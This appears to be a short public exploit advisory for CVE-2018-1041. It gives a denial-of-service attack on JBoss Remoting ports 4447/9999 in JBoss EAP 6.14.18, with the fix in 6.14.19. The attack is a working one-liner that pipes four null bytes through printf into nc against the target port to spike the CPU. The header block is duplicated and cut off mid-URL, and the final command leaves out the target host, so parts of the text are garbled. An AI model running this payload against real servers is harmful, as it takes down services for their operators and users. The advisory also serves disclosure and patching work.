# Exploit Title: Exploit Denial of Service JBoss Remoting (4447/9999)

# Date: 14-02-2018

# Exploit Author: Frank Spierings

# Vendor Homepage:
https://www.redha # Exploit Title: Exploit Denial of Service JBoss Remoting (4447/9999)

# Date: 14-02-2018

# Exploit Author: Frank Spierings

# Vendor Homepage:

# Software Link: http://ftp.redhat.com/pub/redhat/jboss/eap/

# Version: JBoss EAP 6.14.18 | Fixed in JBoss EAP 6.14.19

# Tested on: Red Hat Enterprise Linux Server release 7.4 |

# CVE : CVE-2018-1041

This is a very easy Denial of Service exploit. The target only requires 4
null bytes: `x00x00x00x00`.

The CPU will instantly spike after receiving this payload.

printf "x00x00x00x00" | nc <target> <port = 4447|9999>

`printf "x00x00x00x00" | nc 4447`